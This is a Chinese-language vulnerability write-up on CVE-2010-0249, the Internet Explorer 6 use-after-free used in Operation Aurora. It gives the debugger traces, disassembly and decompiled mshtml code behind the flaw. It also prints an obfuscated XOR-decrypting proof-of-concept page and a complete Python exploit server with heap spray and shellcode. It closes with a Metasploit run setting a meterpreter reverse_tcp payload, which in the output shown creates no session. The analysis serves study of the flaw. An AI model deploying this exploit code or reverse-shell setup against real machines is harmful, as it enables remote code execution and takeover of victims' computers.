cve-2010-0249
漏洞简介
极光行动(英语:OperationAurora)或欧若拉行动,是2009年12月中旬可能源自中国的一场网络攻击,其名称“Aurora”(意为极光、欧若拉))来自攻击者电脑上恶意文件所在路径的一部分。遭受攻击的除了Google外,还有20多家公司:其中包括Adobe Systems、Juniper Networks、Rackspace、雅虎、赛门铁克、诺斯洛普·格鲁门和陶氏化工。这场攻击过后,Google提出了它的新计划:它将“在必要的法律范围内”,于中国运营一个完全不受过滤的搜索引擎;同时Google也承认,如果该计划不可实现,它将可能离开中国并关闭它在中国的办事处(来源于维基百科)。而极光行动用的0day就是cve-2010-0249。
漏洞成因是mshtml的EVENTPARAM引用对象的时候,却没有增加对象的引用计数。导致了悬垂指针的产生。当对象的引用计数耗尽,对象就会被释放。但是EVENTPARAM的悬垂指针就产生了,远程攻击者可通过诱使用户访问恶意网页非法操作内存在用户系统上执行指令。也就是UAF(Use After Free)
测试环境
操作系统 Win XP SP3
IE版本 IE6
漏洞分析
网上的poc找了很多但在别人的文章里能加载网页之后就会断下,我这里却断不下来,具体也不知道是什么原因。最后找到了一个poc
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">
<html>
<head>
<script>
var IwpVuiFqihVySoJStwXmT ='04271477133b000b1a0c240339133c120e2805160e1503684d705005291a08091b3e6e713e1122520b03123d051808392c0d27123b0a0805033c1c0735321a2407350314142935250829083c0a0000072f142624011f2a27022825082f253f2c39394a716a2615275207142524357d43772c2702705a2f466a657c6e4a256a7450614176566c65257e4165310515150a0f2b35302a103d0e03041e0234362f3a3c34073e1b0d0d02131e3f1635200e21101c38093913112e322223211f3239302133381b330a0c2c1175576c2e2713251f2308236b2f270f2d3e2d353c172b03393164031d192b1e363c012f072d311538230f2e113979490b03123d051808392c0d27123b0a0805033c1c0735321a2407350314142935250829083c0a0000072f142624011f2a27022825082f253f2c39393125176614310627466a656e0d3a3968730d261334463b1122303b07052d3d3705303e36340f05131d0b2934142b070d33657175043926244b261334461d362b31063d3e00263e1c110f11080f250e340020150110220c1e111c3d0e273f3a3a21050f2b2208341f04042c684d701c231177043e270b3562614b26133446220e083e1c0d0e1b3d1d31362b271221170036001a240230092e222638383d152b1a23162b0d3330230b14053e3e3c1a321537122d27043a30271d2439383b121f160a033e1c211e383f203e3e143136190210081f2c1e231603112d363975576c3f261523112716327e2a20042f3e211f3e5221212e233d131c0f1318223d2a24080212361718392626070a24072c27102533210823092a15390917190d3e3310250d0c04053d04173d1c0f212b180820333c382d3e3d2036000921320a1c36371e4e7e3e3a34186c271f1707352e1f260a1a2d281c3b3c1e113411272e3d2419043d080611023c280d1c3318332b3b1c3d061f0b050810103b173a160f32230a060d16260216001c1c05684d70070d223c330d113901070b001d02110b152f361f3818180a3f180725123a121534381f0c113b05152021162a3e211e26282f012408242e381f27020605220124293309293c3321011a033a040822143533003f08000e22392c35270835137f656b701f2a727c4175077f5565726920537b782e55254b7f52366039610b75286d05364b7255723078305e2e6f3d49624b76432223746108693f7b47694063136423756c4f392c7d49695733526f7c7d701f75287b167507725f632369205e29797f5525417152616039315c78786d05644a720372302a6d592a6f3d44364b774322767b6153693f7c4164136313637c2a314f3973704966573355602328701f782b7c1175077f506e7469205e7b7e7a55254623526460396c08787d6d0569107f5672302a6d597b6f3d1669462743227129665d693f2e13364763136e762a364f397e29433657335460717f701f75727c16750722506e726920537b2c7d55254b7752646039615b78726d0536477f5672302a365e746f3d4436147f4322777b315c693f7c116245631331217e624f392c7d4963573300337174701f75727116750772076e7569205e742c7d5525467f00336039615375796d05644a74517230756d53756f3d43364b2443227c7d6c59693f2c46644a631331217f334f397e7a4469573354602328701f752c714075072002647269205e7d797f55254b7f5f6460396c5d78796d05364775517230756d5e7d6f3d493240714322767b6c59693f7141644063136e7475634f397e7044675733006f2374701f2a2e7c48750772556e776920592a73795525462452646039615a787d6d056942200572307566592a6f3d496840714322777b610c693f7c4963456313637575674f397e794236573352357c7d701f2a727b16750772506e7c69205e7b7e7155254b705f6660396c5378736d056442725772307567592a6f3d42674b754322717f3352693f7c41694a6313317d756c4f397370496957335260712d701f78737c407507725e6e7769205e297e7e55254b77003460393352787b6d05644a7f507230756d5e296f3d426714224322712a6c58693f71466941631363762a6d4f39732e16655733006f7c7f701f2a2e2c4675072250637c69205e2d7e7e5525467f5f666039330e75726d0564452250723075375e7f6f3d16684b754322712e3353693f7c15644b6313632478634f397e7b446857330062717c701f787971487507750063276920537c7e7e55254624556060396158787b6d0563457f5f7230756c5e2a6f3d44314b714322232f6c5a693f7c1163146313637c75374f39797f496357335231767b701f782b711275077400637c69205e7c7e7b55254b2052656039610b2a726d056245725672302a3153756f3d166514224322767b615d693f7c4069406313647278624f39737b146657335f6f717a701f757c714975077500652369205e7b2c70552514255f6660396c5d75286d053647205e723028635e7b6f3d4463147f4322717f615d693f7c11634563133126786d4f397378423657335f352328701f78737c4275077451317c6920587b73795525467e5f316039615975726d0564417f5672307564537f6f3d49694171432223796c58693f7c49644063136e7378374f397379496357335f65772a701f75787c1275077551637d6920582a732a5525417154316039615b78286d056945725772302a360c756f3d4469147f4322217a335f693f714136116313637378664f397e7916345733006f7c7f701f7f7d7a47750772046e766920582a787f55254b765f3160396152787d6d05644b200272307562582a6f3d163446774322717b6c08693f7b4764406313637d2a6d4f397379446657335264217a701f75287a477507725731216920537f7e705525407152656039665d757c6d05364a205f72302a315e756f3d43364b7643227c7a6c5a693f71406944631331702a314f39782e496957335f6f2328701f2a2e2e147507725565236920537a2e7e55254b7552656039330978786d0564137f5e723078305e7e6f3d496246754322717b675d693f71436910631363722a314f397e79496357335236762a701f7f2c714175077f546e276920537d7e715525147f006f6039335f75286d05644a725f72307865532e6f3d49674b704322712e610c693f7147694563133170786d4f39737844615733526e7174701f757b7c4175077451637669205e7a2c7d552541715f6e6039335f78736d0569407f5472302a60537e6f3d44634b7443227c7c6153693f2e49644b6313637575674f397e784960573355312375701f782b2e1475077400637c69205e7e7e7b552546705f6060396c5c757d6d0569457251723078665e296f3d4962147e4322717b615b693f7b47364a63136e277e334f397e7e1466573355607c7d701f2a2e71477507725e6e2369200e7a737b552540205f616039665d757d6d056443200572302a6d537e6f3d16334b754322217a6c53693f7c4769406313637475374f39792e4432573352317c7c701f75282e147507725f642369200c282c7d55251473526660396159752c6d05364b205372307565532e6f3d44324b7f43227c7c6c59693f2e1469436313657278634f39737049365733526e717e701f757d2e487507725e6e7269205e7b792e55254b755560603933097f2c6d05364b200272307830582a6f3d4462147e43222375670c693f7146694263136e7575634f397e71146657335f317c2a701f757a714875077f56637569200c75737955254624546060396c0c757b6d056413725e7230786d0c746f3d4336467543227c75665d693f7c41344463136e7c78344f397e7a4432573352357c7a701f757b7c467507725e317d69200c74737b55254671543160396c527e2c6d05644b7f57723078675e7d6f3d493246744322717a6c08693f7c4263146313632378304f39737f496257335f657c7a701f2e2c714875072751672769205e2d2c2a5525167e0235603936537e736d056746225f72302a6158786f3d443210774322767d600b693f794267136313322474664f397a7b16335733076e727d701f2e2c79497507715767716920087e727155254a73006e603931082f2f6d0567137e0572307d36582a6f3d1663172343227728360b693f7e4763116313662675304f392f7b166057330734237e701f2d7b7f1275077451327369205c297a7155254a20566f603961522d7d6d0561427451723079605a7a6f3d14621724432277756553693f7846364463136675296c4f397f2a4369573353622074701f757e7a4475077603357d69205a7b787a55254127543460396c5e7b7c6d053511720272302d610c2f6f3d486941734322707d3659693f714068146313347c7d664f392e2a4864573350667d2e701f2a282b427507275036246920097b7b7955251175036260393759297b6d056047205172307f3759746f3d466911704322757e6c5c693f7e4735446313637629624f39737f1361573304317c7e701f7e7f7b4175077104367169200c7d7e2a55254b2354666039625829286d0567137f57723079635a286f3d406846714322747f655b693f7d466011631336777c634f392f2b136157335431767e701f7e782d4475077004357669200f7a297a5525407e5f316039370f7a286d056917725372302d6553786f3d473640744322242d665a693f714433436313317478674f397f714834573356367274701f2a7c7c157507715f672769205f757d2b552543730760603964582f296d053543705772307c6c597f6f3d473416734322277e360b693f7d476247631332737c6c4f39292e476557335e602774701f7c2c791575077354637169205f2a28785525422203366039665a7b7a6d0536177207723079345b746f3d42614673432273796652693f7c11681463136e2328674f39287d4568573305637d2d701f792e7d4275077652347d69205d2a7d7b5525177452626039630c7d736d053211765572307d6308796f3d436642234322217a675d693f7b426847631362267a624f39297a426957335f62777a701f287a7c447507735333236920522d7b7b5525447f51616039345b742f6d053614715072307a6559786f3d4967407643227079665c693f7b486044631335752f6c4f392c79413357335135702a701f2a2f7c12750771046f2369200b74722a5525452405626039650929796d0562142402723079665b7a6f3d4533447e4322267a6d08693f7b456940631363757b334f39282a163157330761247a701f787e2945750775506f216920537e732955251025036f60396c5a292b6d056716775e706c77230b3e6a3d1136050e2131121938122703291d704f66131c0127232b0819053d13020b1600280e3f1006181c22123d0e1334312102332d181b360939130131020d3a18383e22123703321c350d230f011b26011819263f27180a272307183a07001c0a340024101b2f2e192e26033437311c24306475486968685b70503344776e6c775a6e6a6350721164467c656e65486c6168523450664d77676920486c6168526050664d77672f774a676a6a4072526d4675216e7543772e27502b523307313204120c1b1f25083b3b270b776e71751f2d2c3f38171411333a3d271c0b216a3550271a2f0a326d6c200b2a3d00373625130b2f2e05340762262d1e37062e466b657c2d0e7c7a7840705b7d0038376c7d396c7768406b5215466b657d605a776a1b5b7b5b662c242228391b38021e1e3e252f201a063c311206222d2132162c2f031524310139380201273b0b131a3d063b222a111b2d704f661336233b1d2d2a1d1d1d28190f073a656775071b2d1f37380b3729013d0e051b3824093607333f1e3f09222428022b1a3e3e190d1003230d223c393c0709131c013320071c0f2f361912041b0237210d103a052577372e053e11320f382b6c02033f2d0d17043c0300360a023001093b293d293313271b09010c3d6429380a3e331c0e1021381a021809062306350a34331c29100c0f0b183b1d173c122714223a21180d03033a002e0e3c2a34163d1c30610b37353f0026033a16331c182528321c13312d073e2006223d1226113836333e230711030d100d3b1f03082e2523363c2d083e1d3f12032c3f14310d01282409243a3b2a2c032d102f38120e262e35085a6f5d3b1122303b07052d3d3705303e36340f05131d0b2934142b070d336571750e23293d1d351c3248343729341e290f3e153e0609043d202f21422f3a321e11282e213331033d3e0f041b26173e14020e200933290d1a033d35083216062b231e3e0b013b1a221a2e0d383d0f023a366373143f11330b322b387b0d293e0d1c351f23082307351c0e64683e18012b0025232a083b25361f07052833200a1316360327050211183a38290c160a0f1d24163e19143c0a1536111029101e24090f1402062f2f0e67657b0322242d0218260b2a77786c7748773d211e341d31482420381c04382f3a06311e6e08363c261b1f1f242b1e2835280e0d0106272f142b3c23141936097b6579654377372e053e11320f382b6c3b0b35200605031c25082f02223d3008003a3508133235132e3c3a42653138506d52643a22752f650c103f781360161a1367267c3136397a2b40342e3356347528091f7c2978140c077605672110205a2f7a2c2c2542255633193965097c2e1405601176020b307c365a28163d403342223a22752f650e103f781360161a1367267c3136397a2b40342e3356347528091f7c2978140c077605672110205a2f7a2c2c2542255633193965097c2e1405601176020b307c365a28163d403342223a22752f650e103f781360161a1367267c3136397a2b40342e3356347528091f7c2978140c077605672110205a2f7a2c2c2542255633193965097c2e1405601176020b307c365a28163d403342223a22752f650e103f781360161a1367267c3148772c2702705a2f466a657c6e4a256a74501d17031e1e082e200c091d0a391c1c1420270c212c121e1e1f371500050a2e352e302838301802113b05053f1139330706123d0a39312e0f222962390f222d3c186b522f4d7c6c37180f0932013d3207202300070519041e0c38393d0b3e3403120b10180f263100321704122d153e14230f29202425142b2c0f30363c2924233d1c0b1b1b48332438344a716a384b2d04271477316c684a201e2615013909031a223b23322d3b0b2029230707130115140128643b0233372a033a2022215131';
var RXb = '';
for (i = 0;i<IwpVuiFqihVySoJStwXmT.length;i+=2) {
RXb += String.fromCharCode(parseInt(IwpVuiFqihVySoJStwXmT.substring(i,
i+2), 16));
}
var vuWGWsvUonxrQzpqgBXPrZNSKRGee = location.search.substring(1);
var NqxAXnnXiILOBMwVnKoqnbp = '';
for (i=0;i<RXb.length;i++) {
NqxAXnnXiILOBMwVnKoqnbp += String.fromCharCode(RXb.charCodeAt(i) ^
vuWGWsvUonxrQzpqgBXPrZNSKRGee.charCodeAt(i%vuWGWsvUonxrQzpqgBXPrZNSKRGee.length));
}
window["eval".replace(/[A-Z]/g,"")](NqxAXnnXiILOBMwVnKoqnbp);
</script>
</head>
<body>
<span id="vhQYFCtoDnOzUOuxAflDSzVMIHYhjJojAOCHNZtQdlxSPFUeEthCGdRtiIY"><iframe
src="/infowTVeeGDYJWNfsrdrvXiYApnuPoCMjRrSZuKtbVgwuZCXwxKjtEclbPuJPPctcflhsttMRrSyxl.gif" onload="WisgEgTNEfaONekEqaMyAUALLMYW(event)" /></span></body></html>
</body>
</html>
把poc放在本地建的服务器上(这里用了iis6.0)然后访问时后面加上?rFfWELUjLJHpP,这里是一个解密的key,至于是怎么来的,应该是自动生成的,如果在Metasploit生成的链接就是有这样一个key
把windbg设置成及时调试器然后直接ie打开输入网址,不一定会一次成功,要多是几次,成功后会直接跳出windbg,会得到下面的页面。
可以看到这里访问了非法地址
(d24.7fc): Access violation - code c0000005 (!!! second chance !!!)
eax=01c93760 ebx=00000054 ecx=00000054 edx=01cb8fd0 esi=01c919c0 edi=ffffffff
eip=7e278c83 esp=0012e35c ebp=0012e37c iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
mshtml!CElement::GetDocPtr:
7e278c83 8b01 mov eax,dword ptr [ecx] ds:0023:00000054=????????
0:000> dd ecx
00000054 ???????? ???????? ???????? ????????
00000064 ???????? ???????? ???????? ????????
00000074 ???????? ???????? ???????? ????????
00000084 ???????? ???????? ???????? ????????
00000094 ???????? ???????? ???????? ????????
000000a4 ???????? ???????? ???????? ????????
000000b4 ???????? ???????? ???????? ????????
000000c4 ???????? ???????? ???????? ????????
往前看一下ecx是由什么传过来的。栈回溯,看到当前函数返回地址是0x7e44c4c8,跟过去
0:000> kv
ChildEBP RetAddr Args to Child
0012e358 7e44c4c8 01c99320 0039bc20 7e4b61ec mshtml!CElement::GetDocPtr (FPO:
[0,0,0])
0012e37c 7e44c623 0039bc28 000003e9 0012e3b0
mshtml!CEventObj::GenericGetElement+0x9c (FPO: [Non-Fpo])
0012e38c 7e3af659 01c936f0 0039bc28 0247f010
mshtml!CEventObj::get_srcElement+0x15 (FPO: [Non-Fpo])
0012e3b0 7e2a8a23 01c936f0 0247f010 01c99320 mshtml!GS_IDispatchp+0x33 (FPO:[Non-Fpo])
0012e430 7e2a88bf 01c936f0 000003e9 7e3af626 mshtml!CBase::ContextInvokeEx+0x462(FPO: [Non-Fpo])
0012e45c 75be1408 01c936f0 000003e9 00000409 mshtml!CBase::InvokeEx+0x25 (FPO:[Non-Fpo])
0012e494 75be1378 0039a4f0 01c993c0 000003e9 jscript!IDispatchExInvokeEx2+0xac(FPO: [Non-Fpo])
0012e4cc 75be6db3 0039a4f0 01c993c0 000003e9 jscript!IDispatchExInvokeEx+0x56(FPO: [Non-Fpo])
0012e53c 75be10d8 0039a4f0 01c993c0 000003e9 jscript!InvokeDispatchEx+0x78 (FPO:[Non-Fpo])
0012e584 75be680b 0039a4f0 0012e5d4 00000002 jscript!VAR::InvokeByName+0xba(FPO: [Non-Fpo])
从最下面往前推,可以看到eax=[ecx]=[ebx]=[[esi]]=[[[eax]]]=[[[[ebp-8]]]]这里eax赋值给esi有个判断,先不管当做就是eax。还可以看到中断的位置的下一句就是一个call eax+…,也就是说如果我们控制了eax也就可以控制整个程序流程,控制eax就需要控制[ebp-8],这明显是个可控的位置。
0:000> ub 7e44c4c8 l20
mshtml!CEventObj::GenericGetElement+0x43:
7e44c46f 8906 mov dword ptr [esi],eax
7e44c471 8d45f8 lea eax,[ebp-8]
7e44c474 50 push eax
7e44c475 e8ce1de3ff call mshtml!CEventObj::GetParam (7e27e248)
7e44c47a 85c0 test eax,eax
7e44c47c 8945fc mov dword ptr [ebp-4],eax
7e44c47f 0f85ae000000 jne mshtml!CEventObj::GenericGetElement+0x107 (7e44c533)
7e44c485 8b450c mov eax,dword ptr [ebp+0Ch]
7e44c488 2de9030000 sub eax,3E9h
7e44c48d 57 push edi
7e44c48e 7422 je mshtml!CEventObj::GenericGetElement+0x86 (7e44c4b2)
7e44c490 83e808 sub eax,8
7e44c493 7412 je mshtml!CEventObj::GenericGetElement+0x7b (7e44c4a7)
7e44c495 48 dec eax
7e44c496 0f8596000000 jne mshtml!CEventObj::GenericGetElement+0x106 (7e44c532)
7e44c49c 8b45f8 mov eax,dword ptr [ebp-8]
7e44c49f 8b7008 mov esi,dword ptr [eax+8]
7e44c4a2 8b787c mov edi,dword ptr [eax+7Ch]
7e44c4a5 eb13 jmp mshtml!CEventObj::GenericGetElement+0x8e (7e44c4ba)
7e44c4a7 8b45f8 mov eax,dword ptr [ebp-8]
7e44c4aa 8b7004 mov esi,dword ptr [eax+4]
7e44c4ad 8b7878 mov edi,dword ptr [eax+78h]
7e44c4b0 eb08 jmp mshtml!CEventObj::GenericGetElement+0x8e (7e44c4ba)
7e44c4b2 8b45f8 mov eax,dword ptr [ebp-8]
7e44c4b5 8b30 mov esi,dword ptr [eax]
7e44c4b7 8b7874 mov edi,dword ptr [eax+74h]
7e44c4ba 85f6 test esi,esi
7e44c4bc 7474 je mshtml!CEventObj::GenericGetElement+0x106 (7e44c532)
7e44c4be 53 push ebx
7e44c4bf 8b1e mov ebx,dword ptr [esi]
7e44c4c1 8bcb mov ecx,ebx
7e44c4c3 e8bbc7e2ff call mshtml!CElement::GetDocPtr (7e278c83)
mshtml!CElement::GetDocPtr:
7e278c83 8b01 mov eax,dword ptr [ecx] ds:0023:00000054=????????
7e278c85 ff5034 call dword ptr [eax+34h]
这里在调试的时候还遇到了比较棘手的问题,就是这里我下的断点都不能断下无论是普通断点、硬件断点、软件访问断点或者消息断点全部都失败了,具体原因还没找到。而且如果把断点下在当前系统中断的位置进行调试会发现还没有载入网页就发生了中断,并且这个中断运行永无止境,一直都不能运行过去。
在来看看之前的栈回溯,调用当前函数的是GenericGetElement,用ida打开mshtml.dll导入符号文件之后找到这个函数。
0:000> kv
ChildEBP RetAddr Args to Child
0012e358 7e44c4c8 01c99320 0039bc20 7e4b61ec mshtml!CElement::GetDocPtr (FPO:
[0,0,0])
0012e37c 7e44c623 0039bc28 000003e9 0012e3b0
mshtml!CEventObj::GenericGetElement+0x9c (FPO: [Non-Fpo])
0012e38c 7e3af659 01c936f0 0039bc28 0247f010
mshtml!CEventObj::get_srcElement+0x15 (FPO: [Non-Fpo])
0012e3b0 7e2a8a23 01c936f0 0247f010 01c99320 mshtml!GS_IDispatchp+0x33 (FPO:
[Non-Fpo])
0012e430 7e2a88bf 01c936f0 000003e9 7e3af626 mshtml!CBase::ContextInvokeEx+0x462
(FPO: [Non-Fpo])
0012e45c 75be1408 01c936f0 000003e9 00000409 mshtml!CBase::InvokeEx+0x25 (FPO:
[Non-Fpo])
0012e494 75be1378 0039a4f0 01c993c0 000003e9 jscript!IDispatchExInvokeEx2+0xac
(FPO: [Non-Fpo])
0012e4cc 75be6db3 0039a4f0 01c993c0 000003e9 jscript!IDispatchExInvokeEx+0x56
(FPO: [Non-Fpo])
0012e53c 75be10d8 0039a4f0 01c993c0 000003e9 jscript!InvokeDispatchEx+0x78 (FPO:
[Non-Fpo])
0012e584 75be680b 0039a4f0 0012e5d4 00000002 jscript!VAR::InvokeByName+0xba
(FPO: [Non-Fpo])
之前可以看到中断的函数是CElement::GetDocPtr,这里它的参数是v5,往前找看v5是什么,v5=v15,而v15是这么定义的struct EVENTPARAM *v15;这里就可以看出v15是一个叫EVENTPARAM数据结构定义的。
int __thiscall CEventObj::GenericGetElement(CEventObj *this, struct IHTMLElement **a2, int a3)
{
CEventObj *v3; // ecx
CEventObj *v4; // ecx
struct CRootElement **v5; // esi
int v6; // edi
struct CRootElement *v7; // ebx
struct CDoc *v8; // eax
CMapElement *v9; // eax
int v10; // eax
CBase *v11; // ecx
int result; // eax
struct IUnknown *v13; // [esp+4h] [ebp-10h]
CEventObj *v14; // [esp+8h] [ebp-Ch]
struct EVENTPARAM *v15; // [esp+Ch] [ebp-8h]
int v16; // [esp+10h] [ebp-4h]
v16 = 0;
v14 = this;
if ( !a2 )
{
v16 = -2147467261;
goto LABEL_23;
}
v3 = v14;
*a2 = 0;
if ( !CEventObj::GetUnknownPtr(v3, a3, &v13) )
goto LABEL_23;
v4 = v14;
*a2 = (struct IHTMLElement *)v13;
v16 = CEventObj::GetParam(v4, &v15);
if ( v16 )
goto LABEL_23;
switch ( a3 )
{
case 1001:
v5 = *(struct CRootElement ***)v15;
v6 = *((_DWORD *)v15 + 29);
break;
case 1009:
v5 = (struct CRootElement **)*((_DWORD *)v15 + 1);
v6 = *((_DWORD *)v15 + 30);
break;
case 1010:
v5 = (struct CRootElement **)*((_DWORD *)v15 + 2);
v6 = *((_DWORD *)v15 + 31);
break;
default:
goto LABEL_23;
}
if ( v5 )
{
v7 = *v5;
v8 = CElement::GetDocPtr(*v5);
if ( v7 != CMarkup::Root(*(CMarkup **)(*(_DWORD *)(*((_DWORD *)v8 + 83) + 44) + 32)) )
{
if ( v6 >= 0 && *((_BYTE *)v5 + 8) == 51 )
{
a3 = 0;
v9 = (CMapElement *)*((_DWORD *)*v5 + 9);
if ( v9 )
{
CMapElement::GetAreaContaining(v9, v6, (struct CAreaElement **)&a3);
if ( a3 )
v5 = *(struct CRootElement ***)(a3 + 16);
}
}
if ( v5 )
{
if ( v5 == *((struct CRootElement ***)*v5 + 4) )
v10 = (*(int (__cdecl **)(struct CRootElement *, GUID *, struct IHTMLElement **))(*(_DWORD *)*v5 + 128))(
*v5,
&IID_IHTMLElement,
a2);
else
v10 = CTreeNode::GetInterface((CTreeNode *)v5, &IID_IHTMLElement, (void **)a2);
v16 = v10;
}
}
}
LABEL_23:
v11 = (CBase *)*((_DWORD *)v14 + 4);
if ( v11 )
result = CBase::SetErrorInfo(v11, v16);
else
result = v16;
return result;
}
这个数据结构的定义是查阅资料得到的。可以看到EVENTPARAM的头子节就是_pNode。
struct EVENTPARAM
+x00 _pNode; // src element
+x04 _pNodeFrom // for move,over,out
+x08 _pNodeTo // for move,over,out
之后换了一个exp,直接运行可以弹出计算器,但想下断点还是有点问题,和上面的情况一样还是无法断下,在一篇文章下面问了作者,还没回复,以后再作补充。
Exp是一个.py文件,运行的方法是在cmd界面输入xxx.py 8080,就可以以端口的方式访问。
Exp
#
# Author : Ahmed Obied (ahmed.obied@gmail.com)
#
# This program acts as a web server that generates an exploit to
# target a vulnerability (CVE-2010-0249) in Internet Explorer.
# The exploit was tested using Internet Explorer 6 on Windows XP SP2.
# The exploit's payload spawns the calculator.
#
# Usage : python ie_aurora.py [port number]
#
import sys
import socket
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
class RequestHandler(BaseHTTPRequestHandler):
def convert_to_utf16(self, payload):
enc_payload = ''
for i in range(0, len(payload), 2):
num = 0
for j in range(0, 2):
num += (ord(payload[i + j]) & 0xff) << (j * 8)
enc_payload += '%%u%04x' % num
return enc_payload
def get_payload(self):
# win32_exec - EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub
# http://metasploit.com
payload = '\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73'
payload += '\x13\x6f\x02\xb1\x0e\x83\xeb\xfc\xe2\xf4\x93\xea\xf5\x0e'
payload += '\x6f\x02\x3a\x4b\x53\x89\xcd\x0b\x17\x03\x5e\x85\x20\x1a'
payload += '\x3a\x51\x4f\x03\x5a\x47\xe4\x36\x3a\x0f\x81\x33\x71\x97'
payload += '\xc3\x86\x71\x7a\x68\xc3\x7b\x03\x6e\xc0\x5a\xfa\x54\x56'
payload += '\x95\x0a\x1a\xe7\x3a\x51\x4b\x03\x5a\x68\xe4\x0e\xfa\x85'
payload += '\x30\x1e\xb0\xe5\xe4\x1e\x3a\x0f\x84\x8b\xed\x2a\x6b\xc1'
payload += '\x80\xce\x0b\x89\xf1\x3e\xea\xc2\xc9\x02\xe4\x42\xbd\x85'
payload += '\x1f\x1e\x1c\x85\x07\x0a\x5a\x07\xe4\x82\x01\x0e\x6f\x02'
payload += '\x3a\x66\x53\x5d\x80\xf8\x0f\x54\x38\xf6\xec\xc2\xca\x5e'
payload += '\x07\x7c\x69\xec\x1c\x6a\x29\xf0\xe5\x0c\xe6\xf1\x88\x61'
payload += '\xd0\x62\x0c\x2c\xd4\x76\x0a\x02\xb1\x0e'
return self.convert_to_utf16(payload)
def get_exploit(self):
exploit = '''
<html>
<head>
<script>
var obj, event_obj;
function spray_heap()
{
var chunk_size, payload, nopsled;
chunk_size = 0x80000;
payload = unescape("<PAYLOAD>");
nopsled = unescape("<NOP>");
while (nopsled.length < chunk_size)
nopsled += nopsled;
nopsled_len = chunk_size - (payload.length + 20);
nopsled = nopsled.substring(0, nopsled_len);
heap_chunks = new Array();
for (var i = 0 ; i < 200 ; i++)
heap_chunks[i] = nopsled + payload;
}
function initialize()
{
obj = new Array();
event_obj = null;
for (var i = 0; i < 200 ; i++ )
obj[i] = document.createElement("COMMENT");
}
function ev1(evt)
{
event_obj = document.createEventObject(evt);
document.getElementById("sp1").innerHTML = "";
window.setInterval(ev2, 1);
}
function ev2()
{
var data, tmp;
data = "";
tmp = unescape("%u0a0a%u0a0a");
for (var i = 0 ; i < 4 ; i++)
data += tmp;
for (i = 0 ; i < obj.length ; i++ ) {
obj[i].data = data;
}
event_obj.srcElement;
}
function check()
{
if (navigator.userAgent.indexOf("MSIE") == -1)
return false;
return true;
}
if (check()) {
initialize();
spray_heap();
}
else
window.location = 'about:blank'
</script>
</head>
<body>
<span id="sp1">
<img src="aurora.gif" onload="ev1(event)">
</span>
</body>
</html>
'''
exploit = exploit.replace('<PAYLOAD>', self.get_payload())
exploit = exploit.replace('<NOP>', '%u0a0a%u0a0a')
return exploit
def get_image(self):
content = '\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00\xff\xff\xff'
content += '\x00\x00\x00\x2c\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02\x44'
content += '\x01\x00\x3b'
return content
def log_request(self, *args, **kwargs):
pass
def do_GET(self):
try:
if self.path == '/':
print
print '[-] Incoming connection from %s' % self.client_address[0]
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.end_headers()
print '[-] Sending exploit to %s ...' % self.client_address[0]
self.wfile.write(self.get_exploit())
print '[-] Exploit sent to %s' % self.client_address[0]
elif self.path == '/aurora.gif':
self.send_response(200)
self.send_header('Content-Type', 'image/gif')
self.end_headers()
self.wfile.write(self.get_image())
except:
print '[*] Error : an error has occured while serving the HTTP request'
print '[-] Exiting ...'
sys.exit(-1)
def main():
if len(sys.argv) != 2:
print 'Usage: %s [port number (between 1024 and 65535)]' % sys.argv[0]
sys.exit(0)
try:
port = int(sys.argv[1])
if port < 1024 or port > 65535:
raise ValueError
try:
serv = HTTPServer(('', port), RequestHandler)
ip = socket.gethostbyname(socket.gethostname())
print '[-] Web server is running at http://%s:%d/' % (ip, port)
try:
serv.serve_forever()
except:
print '[-] Exiting ...'
except socket.error:
print '[*] Error : a socket error has occurred'
sys.exit(-1)
except ValueError:
print '[*] Error : an invalid port number was given'
sys.exit(-1)
if __name__ == '__main__':
main()
补丁
MS10-002
https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2010/ms10-002#%E6%9C%AA%E5%88%9D%E5%A7%8B%E5%8C%96%E7%9A%84%E5%86%85%E5%AD%98%E6%8D%9F%E5%9D%8F%E6%BC%8F%E6%B4%9E---cve-2010-0249
渗透测试
比较郁闷的是渗透失败了,具体还不知道为什么,版本应该没有什么问题。
[-] ***
[-] * WARNING: No database support: No database YAML file
[-] ***
_---------.
.' ####### ;."
.---,. ;@ @@`; .---,..
." @@@@@'.,'@@ @@@@@',.'@@@@ ".
'-.@@@@@@@@@@@@@ @@@@@@@@@@@@@ @;
`.@@@@@@@@@@@@ @@@@@@@@@@@@@@ .'
"--'.@@@ -.@ @ ,'- .'--"
".@' ; @ @ `. ;'
|@@@@ @@@ @ .
' @@@ @@ @@ ,
`.@@@@ @@ .
',@@ @ ; _____________
( 3 C ) /|___ / Metasploit! \
;@'. __*__,." \|--- \_____________/
'(.,...."/
=[ metasploit v5.0.12-dev-b021cbafa9e58f48b8e940ad2ebc4e4d38b9ec09]
+ -- --=[ 1866 exploits - 1058 auxiliary - 327 post ]
+ -- --=[ 546 payloads - 44 encoders - 10 nops ]
+ -- --=[ 2 evasion ]
msf5 > use windows/browser/ms10_002_aurora
msf5 exploit(windows/browser/ms10_002_aurora) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/browser/ms10_002_aurora) > show options
Module options (exploit/windows/browser/ms10_002_aurora):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf5 exploit(windows/browser/ms10_002_aurora) > set LHOST 10.100.247.120
LHOST => 10.100.247.120
msf5 exploit(windows/browser/ms10_002_aurora) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf5 exploit(windows/browser/ms10_002_aurora) >
